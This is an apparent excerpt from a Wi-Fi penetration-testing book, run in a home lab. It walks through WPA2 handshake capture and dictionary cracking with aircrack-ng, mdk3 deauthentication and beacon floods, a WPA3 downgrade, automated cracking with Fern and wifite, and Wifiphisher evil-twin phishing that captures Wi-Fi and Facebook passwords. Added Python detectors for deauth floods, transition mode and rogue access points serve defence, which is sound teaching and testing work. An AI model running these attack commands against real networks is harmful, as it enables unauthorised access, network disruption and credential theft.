(WPA). These include both data integrity/confidentiality attacks and Denial
of Service (DOS) attacks.
Data Integrity/Confidentiality Attacks
Pre-Shared Key (PSK) Attacks
Pre-Shared Key (PSK) Monitoring Attack
Pre-Shared Key (PSK) Dictionary Attack
Rivest Cipher 4 (RC4) Attack
Denial of Service (DOS) Attacks
Wi-Fi Protected Access (WPA) Protocol Shutdown Attack
Radio Frequency (RF) Jamming Attack
WPA-PSK attack
WPA-PSK is prone to offline dictionary attacks because the 4-way handshake that verifies the session key is sent in clear: the nonces and the MIC it carries let an attacker who captured the handshake test passphrase guesses without any further interaction with the network. The PMK is derived as PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits); the SSID acts as a salt, so a table precomputed for one SSID is useless for another, but the same passphrase on the same SSID always yields the same PMK.
WPA2 password attack process
1) Send a deauthentication frame with aireplay-ng, which makes the client station lose its network connection and forces a re-authentication.
2) During this time, use airodump-ng to capture the 4-way authentication handshake.
Note: WPA2 networks are vulnerable to this attack only if the passphrase can be guessed.
WPA password cracking with a Pre-Shared Key (PSK) dictionary attack
If the attacker does not know the Pre-Shared Key (PSK), they may perform the Pre-Shared Key dictionary attack to attempt to determine the key. For user-selected passphrases (PSKs) of less than 20 characters, this type of attack is expected to be successful (the 802.11i standard itself warns of this).
In this attack the passphrase is determined by taking candidates from a dictionary of common passphrases, running each one through the well-known algorithm that generates the Pairwise Master Key (PMK), deriving the PTK from the PMK and the two nonces seen in the handshake, and comparing the resulting MIC with the one in the captured frame.
Method 1: Wait for a client to connect (or speed it up with a broadcast deauthentication)
Step 1: Let’s configure the Linksys router with WPA-PSK security mode
Open a browser and enter the router admin http://192.168.1.1/ with default
user/password admin/admin and we choose channel 11 as operating
channel.
Step 2: Connect our alfa adapter to the windows 10 laptop and next connect
it on Kali Linux.
Note: The windows 10 host laptop is connected to the network
“MyWifi”
Step 3: Put the wireless interface into monitor mode.
airmon-ng start wlan0
Step 4: Capture networks packets
Find the BSSID and channel used with the command airodump-ng wlan0
Monitor the traffic of our target with the following command:
airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w Wapcap wlan0
-c number: channel number
-w <prefix>: Dump file prefix
Step 5: Capture the handshake
Legitimate clients must be disassociated, forcing them to initiate a new association and allowing us to capture the 4-way handshake messages.
Open a second terminal and type aireplay-ng -0 1 -a 68:7F:74:30:95:BA wlan0
In the monitoring terminal (the first one), you should see "WPA handshake: 68:7F:74:30:95:BA" appear in the top right corner.
Step 6: Perform a dictionary attack on the cap file
Open a third terminal and type aircrack-ng -w <dictionary> <cap file>, in our case
aircrack-ng -w password.txt Wapcap-01.cap
(airodump-ng numbers its output files; the first capture with prefix Wapcap is Wapcap-01.cap.)
We found the password password777 in our password.txt file in 1 minute, 3 seconds.
Method 2: Active attack (kick a specific user off and wait for it to reconnect)
Do the same for Step 1 through Step 4
Step 5: Capture the handshake
Open a terminal and type aireplay-ng --deauth 1 -a 68:7F:74:30:95:BA -c 3C:6A:A7:AC:20:A6 wlan0
--deauth count (same as -0): number of deauthentication bursts to send; 0 means keep sending until stopped
-a bssid: set the access point MAC address
-c dmac: set the destination (client) MAC address; without -c the deauthentication is broadcast to all stations
In the monitoring terminal (the first one), you should see the captured handshake.
Step 6: Perform a dictionary attack on the cap file
Open a new terminal and type aircrack-ng -w <dictionary> <cap file>
We found the password password777 in our password.txt file in 1 minute, 1 second.
Denial of Service (DOS) Attacks
MDK3 (Murder Death Kill 3) is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
mdk3 syntax
mdk3 <interface> <test_mode> [test_options]
Perform a DoS attack with MDK3
Step 1: Put the interface into monitor mode
Step 2: Jam the network
SSID flooding or beacon flooding with mdk3
mdk3 wlan0 b -c 11 -n <ssid> floods the channel with beacon frames for fake access points, which then show up in the Wi-Fi list of every nearby client.
b: Beacon flood mode, send beacon frames to show fake APs to clients
-c: channel number
-n <ssid>: use SSID <ssid> instead of randomly generated ones
DoS attack methods with MDK3
I. Authentication flooding: flood the access point with authentication requests
Open a second terminal and type the following command
mdk3 wlan0 a -a 68:7F:74:30:95:BA
-a <AP_MAC>: only test the specified AP
Wait until the AP stops responding; you will be disconnected from the Wi-Fi network.
II. Deauthentication flooding: target one or all users on a specific BSSID
mdk3 wlan0 d -b listofmac
d: Deauthentication/Disassociation Amok mode, kicks everybody found off the AP
-b <file>: blacklist file; only attack the MAC addresses listed in it (use -w <file> instead for a whitelist of addresses to leave alone)
These attacks are noisy and easy to detect: a monitor-mode capture shows bursts of deauthentication or authentication frames at a rate no legitimate AP or client produces, and with 802.11w Protected Management Frames (mandatory in WPA3) the forged deauthentication frames are simply ignored.
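The deauthentication and authentication floods above, seen from the defender's side of the monitor-mode capture described in "Wireless Sniffing", as an added example that is not part of the original book: a small Python 802.11 management-frame parser and a sliding-window detector for deauth/disassoc floods like the ones aireplay-ng -0 and mdk3 d produce. The capture is constructed inline (the lab BSSID and client MAC from the book are reused as sample addresses); on a real system the frames would be read from a pcap written by airodump-ng -w, after stripping the radiotap header that such captures prefix to each frame.

```python
"""Decode raw 802.11 management frames from a monitor-mode capture and flag
deauthentication/disassociation floods such as aireplay-ng -0 or mdk3 d.
The capture below is constructed by hand; real frames would come from a pcap
written by airodump-ng -w (strip the radiotap header first)."""
import struct
from collections import defaultdict, deque

MGMT = 0                                          # frame type 0 = management
BEACON, DISASSOC, AUTH, DEAUTH = 8, 10, 11, 12    # management subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype: int, dst: bytes, src: bytes, bssid: bytes, seq: int, body: bytes = b"") -> bytes:
    """802.11 MAC header: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2), then body."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0])          # protocol version 0, flags 0
    return fc + b"\x00\x00" + dst + src + bssid + struct.pack("<H", seq << 4) + body


def parse_80211(frame: bytes) -> dict:
    """Type, subtype, the three addresses, sequence number and, for deauth/disassoc, the reason."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    info = {"type": ftype, "subtype": subtype,
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]),
            "seq": struct.unpack("<H", frame[22:24])[0] >> 4}
    if ftype == MGMT and subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]
    return info


def detect_deauth_flood(events, window: float = 1.0, threshold: int = 10) -> list:
    """events: iterable of (timestamp, raw_frame) in time order. Emits one alert per
    BSSID when more than `threshold` deauth/disassoc frames for it arrive within
    `window` seconds. Broadcast deauths with reason 7 are the aireplay-ng -0 signature."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ts, raw in events:
        f = parse_80211(raw)
        if f["type"] != MGMT or f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        q = recent[f["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and f["bssid"] not in alerted:
            alerted.add(f["bssid"])
            alerts.append({"bssid": f["bssid"], "count": len(q), "at": ts,
                           "broadcast": f["dst"] == BROADCAST, "reason": f.get("reason")})
    return alerts


AP = bytes.fromhex("687f743095ba")       # the book's lab AP, reused as a sample address
STA = bytes.fromhex("3c6aa7ac20a6")      # the book's lab client
BCAST = bytes.fromhex("ffffffffffff")


def sample_capture() -> list:
    """Constructed trace: three beacons, one legitimate deauth (reason 3, station
    leaving), then 30 spoofed broadcast deauths with reason 7 within 300 ms."""
    events = [(0.1 * i, build_mgmt(BEACON, BCAST, AP, AP, i)) for i in range(3)]
    events.append((0.35, build_mgmt(DEAUTH, STA, AP, AP, 3, struct.pack("<H", 3))))
    for i in range(30):
        events.append((1.0 + 0.01 * i,
                       build_mgmt(DEAUTH, BCAST, AP, AP, 100 + i, struct.pack("<H", 7))))
    return events
```

Tune window and threshold to the environment: a legitimate AP occasionally sends a single deauthentication to one client with a reason such as 3 (station leaving), whereas an aireplay-ng -0 burst sends dozens of broadcast frames with reason 7 in well under a second, and mdk3 rotates reason codes and source addresses. Sequence-number gaps and frames that carry the AP's address but arrive at a different signal strength are further signals when the radiotap data is kept.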
Crack WPA3
Wi-Fi 6: Wi-Fi 6 (IEEE 802.11ax standard) is the next generation standard
in WIFI technology, Wi-Fi 6 provides the capacity, efficiency, coverage, and
performance required by users today in wi-fi environments.
Connect to the new netgear router
1- In a browser enter www.routerlogin.net
2- Enter default username and password of your router
3- Once connected go to Wireless and select WPA3-Personal
Our router gives us the option to select either WPA2-psk [AES] or WPA-
PSK [tkip + WPA2-PSK [AES] or WPA3.
The new WPA3 security protocol successor to WPA2 aims to better protect
the wireless links established between an AP and a Client. With WPA3, it is
almost impossible to crack the password of a computer network. However,
when it was released, 2 researchers specializing in computer security, Eyal
Ronen and Mathy Vanhoef, discovered a way to exploit vulnerabilities.
As of the publication of this book, the vulnerabilities discovered have
already been the subject of software patches.
Downgrade attack scenario
The Netgear router gives us the possibility to activate Guest mode; in this
mode we will test the downgrade attack on WPA3.
WPA3 backwards compatibility is known as WPA3-Transition mode. This mode
allows a network to operate WPA3 and WPA2 protection with the same
password.
1- Go to Guest Network and check Enable Guest Network
2- In Security Options - Profile, select WPA2-Personal [AES] + WPA3-
Personal and click Apply
Since our guest Wi-Fi allows a downgrade to WPA2 for old devices, we can use
the methods shown earlier in this book to crack WPA2 Wi-Fi. Cracking the
password of the old protocol gives us the password that also connects to
the new one, WPA3.
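Whether an AP is really in transition mode is visible in the RSN information element of its beacons: a WPA3-only network advertises the SAE AKM suite alone, while a transition-mode network advertises both PSK and SAE. The parser below is an added example (not from the book or any tool it mentions) for auditing your own AP; the two element byte strings are constructed for the example, not captured from the book's router.

```python
import struct

OUI = bytes.fromhex("000fac")  # IEEE 802.11 suite selector OUI
AKM = {1: "802.1X", 2: "PSK", 6: "PSK-SHA256", 8: "SAE"}
CIPHER = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104"}

def _suite(raw: bytes, table: dict) -> str:
    """Map a 4-byte suite selector (OUI + type) to a name."""
    return table.get(raw[3], f"type{raw[3]}") if raw[:3] == OUI else f"vendor:{raw.hex()}"

def parse_rsn(element: bytes) -> dict:
    """Parse a full RSN information element (ID 48, length, body) from a beacon."""
    if element[0] != 48 or element[1] != len(element) - 2:
        raise ValueError("not a well-formed RSN element")
    body, off = element[2:], 0
    version, = struct.unpack_from("<H", body, off); off += 2
    if version != 1:
        raise ValueError(f"unsupported RSN version {version}")
    group = _suite(body[off:off + 4], CIPHER); off += 4
    n, = struct.unpack_from("<H", body, off); off += 2
    pairwise = [_suite(body[off + 4 * i:off + 4 * i + 4], CIPHER) for i in range(n)]; off += 4 * n
    n, = struct.unpack_from("<H", body, off); off += 2
    akms = [_suite(body[off + 4 * i:off + 4 * i + 4], AKM) for i in range(n)]; off += 4 * n
    caps, = struct.unpack_from("<H", body, off)   # RSN capabilities: bit 7 MFPC, bit 6 MFPR
    return {"group": group, "pairwise": pairwise, "akm": akms,
            "mfpc": bool(caps & 0x80), "mfpr": bool(caps & 0x40)}

def audit(element: bytes) -> tuple:
    """Classify the personal-mode security of an AP and list downgrade risks."""
    rsn = parse_rsn(element)
    akm, warnings = set(rsn["akm"]), []
    if akm == {"SAE"}:
        mode = "WPA3-Personal only"
    elif "SAE" in akm and akm & {"PSK", "PSK-SHA256"}:
        mode = "WPA3 transition mode (WPA2-PSK + SAE)"
        warnings.append("same passphrase is reachable through the WPA2-PSK handshake")
    elif akm & {"PSK", "PSK-SHA256"}:
        mode = "WPA2-Personal"
    else:
        mode = "other: " + ",".join(sorted(akm))
    if "TKIP" in rsn["pairwise"] or rsn["group"] == "TKIP":
        warnings.append("TKIP enabled")
    if "SAE" in akm and not rsn["mfpr"]:
        warnings.append("management frame protection not required")
    return mode, warnings

# Constructed RSN elements (hex): CCMP group/pairwise, then AKM list, then capabilities.
TRANSITION = bytes.fromhex("3018 0100 000fac04 0100 000fac04 0200 000fac02 000fac08 8000")
WPA3_ONLY = bytes.fromhex("3014 0100 000fac04 0100 000fac04 0100 000fac08 c000")
```

Run `audit()` over the RSN element of your own AP's beacon: the guest profile configured above should classify as transition mode, and the main network as WPA3-Personal only.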
Automated Wi-Fi (WPA2/WPS) cracking
Crack WPA2 using Fern Wi-Fi Cracker
Fern Wi-Fi Cracker is a wireless security auditing and attack program
written in Python with the Python Qt GUI library. It can crack and recover
WEP, WPA and WPS keys and also run other network-based attacks on wireless
or Ethernet-based networks.
1- Go to the Kali menu and select Wireless Attacks -> Fern Wifi Cracker
2- Select the wireless interface and click the Scan for Access Points
button
3- Click the Wi-Fi WPA button, which shows a list of detected Access
Points.
4- Select the "MyWifi" access point (the others belong to my neighbors)
and browse for the password file "password.txt"
5- Click the Attack button at the upper right and wait for the password
to be cracked.
6- Click the OK button in these two windows
7- In the "Attack Panel" window, the message "1 keys cracked"
appears; then close the window.
8- In the main window of Fern Wifi Cracker, click the "Key Database"
button.
The Fern-key Database window appears with information about our AP as
well as the cracked password.
Crack WPA2 using wifite
1) In Kali, go to Wireless Attacks and open wifite
2) Install hcxdumptool with the following command: apt-get install
hcxdumptool
hcxdumptool: tool to run several tests to determine if APs or clients
are vulnerable.
3) Install hcxpcaptool:
git clone https://github.com/ZerBea/hcxdumptool.git
4) Change directory with the command cd hcxdumptool
5) Type make
6) Type make install
7) Enter the command: wifite -i wlan0 --verbose --random-mac
--clients-only -c 11 --wpa --dict /usr/share/wordlists/password.txt
Wifite found our Wi-Fi "MyWifi".
8) Press Ctrl+C to select the desired AP, in our case MyWifi, press
Enter and wait for wifite to crack the password
9) If wifite successfully cracks the password, you should see the PSK:
Password: password777
Man In The Middle attack with Wifiphisher
Wifiphisher is a rogue Access Point framework for conducting Wi-Fi
security testing. Using Wifiphisher, penetration testers can easily achieve a
man-in-the-middle position against wireless clients by performing targeted
Wi-Fi association attacks. Wifiphisher can be further used to mount victim-
customized web phishing attacks against the connected clients in order to
capture credentials or infect the victim stations with malware.
How does Wifiphisher work?
Wi-Fi phishing consists of two steps:
Step 1:
The first step involves associating with Wi-Fi clients without their
knowledge, or in other words, obtaining a man-in-the-middle (MITM)
position. Wifiphisher uses a number of different techniques to achieve this,
including:
Evil Twin, where Wifiphisher creates a fake wireless network
that looks similar to a legitimate network.
KARMA, where Wifiphisher masquerades as a public network
searched for by nearby Wi-Fi clients.
Known Beacons, where Wifiphisher broadcasts a dictionary of
common ESSIDs that nearby wireless stations have likely
connected to in the past.
At the same time, Wifiphisher keeps forging "Deauthenticate" or
"Disassociate" packets to disrupt existing associations and eventually lure
victims using the above techniques.
Step 2:
There are a number of different attacks that can be carried out once
Wifiphisher grants the penetration tester a man-in-the-middle position.
For example, the tester may perform data sniffing or scan the victim
stations for vulnerabilities.
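The three association techniques above each leave a trace in a passive scan: an Evil Twin is a second BSSID advertising your SSID (typically open, so the captive portal can be served), and KARMA or Known Beacons show up as one BSSID answering for many unrelated SSIDs. The following check is an added example (not from the book or from Wifiphisher) that compares scan results against a trusted inventory; the BSSID assigned to "MyWifi" and the scan records are constructed for the example.

```python
from collections import defaultdict

# Trusted inventory of our own AP(s): SSID -> (BSSID, security).  The BSSID is the
# AP MAC used earlier in the text; treating it as MyWifi's BSSID is an assumption.
KNOWN_APS = {"MyWifi": ("68:7f:74:30:95:ba", "WPA2-PSK")}

def find_rogue_aps(beacons, known=KNOWN_APS, max_ssids_per_bssid=3):
    """beacons: iterable of (bssid, ssid, channel, security) from a scan.
    Returns [(rule, bssid, detail)] for Evil Twin, security downgrade and
    KARMA/Known-Beacons style behaviour."""
    findings, seen = [], set()
    ssids_by_bssid = defaultdict(set)
    for bssid, ssid, channel, security in beacons:
        bssid = bssid.lower()
        ssids_by_bssid[bssid].add(ssid)
        if (bssid, ssid) in seen:          # beacons repeat; report each pair once
            continue
        seen.add((bssid, ssid))
        if ssid in known:
            known_bssid, known_sec = known[ssid]
            if bssid != known_bssid:
                findings.append(("evil-twin", bssid,
                                 f"advertises {ssid!r} as {security} on channel {channel}"))
            elif security != known_sec:
                findings.append(("security-downgrade", bssid,
                                 f"{ssid!r} now {security}, expected {known_sec}"))
    for bssid, ssids in ssids_by_bssid.items():
        if len(ssids) > max_ssids_per_bssid:   # one radio answering for many networks
            findings.append(("known-beacons", bssid, f"{len(ssids)} SSIDs from one BSSID"))
    return findings

# Constructed scan (assumption): our AP, an open twin of it, a multi-SSID rogue, a neighbour.
SAMPLE_SCAN = [
    ("68:7F:74:30:95:BA", "MyWifi", 11, "WPA2-PSK"),
    ("02:11:22:33:44:55", "MyWifi", 6, "Open"),
    ("02:11:22:33:44:55", "MyWifi", 6, "Open"),
    ("02:aa:bb:cc:dd:ee", "CoffeeShop", 1, "Open"),
    ("02:aa:bb:cc:dd:ee", "AirportFree", 1, "Open"),
    ("02:aa:bb:cc:dd:ee", "HotelGuest", 1, "Open"),
    ("02:aa:bb:cc:dd:ee", "Free WiFi", 1, "Open"),
    ("a4:2b:8c:00:00:01", "Neighbor", 1, "WPA2-PSK"),
]

if __name__ == "__main__":
    for rule, bssid, detail in find_rogue_aps(SAMPLE_SCAN):
        print(f"{rule:<18} {bssid}  {detail}")
```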
Network manager scenario
1- Connect the Alfa 1900 adapter and the Alfa AWS360NH
2- Put the desired adapter in monitor mode
3- Change directory with the command cd wifiphisher
4- Run the tool by typing wifiphisher -aI wlan1 -eI wlan0
-aI interface: manually choose an interface that supports AP mode
for spawning an AP
-eI interface: manually choose an interface that supports monitor
mode for running the extensions.
5- Select the desired Wi-Fi, in our case MyWifi.
6- Select the type of scenario
7- Wifiphisher will attempt to send deauth packets to the victim
8- Once the victim (my Samsung Galaxy phone) connects to the fake
AP, a window appears asking them to enter the Wi-Fi password.
9- The password is displayed in clear text in the window that
follows.
10- Press Esc to quit Wifiphisher; once again the password is
displayed in clear text.
Capturing credentials from social networks (Facebook)
1- Select the OAuth Login scenario
2- Wifiphisher will attempt to send deauth packets to the victim
3- Once connected, a new window appears asking the user to enter a
Facebook account.
The victim's Facebook account email and password are displayed in clear
text in the following window.
4- Press Esc to quit Wifiphisher; once again the password is displayed
in clear text.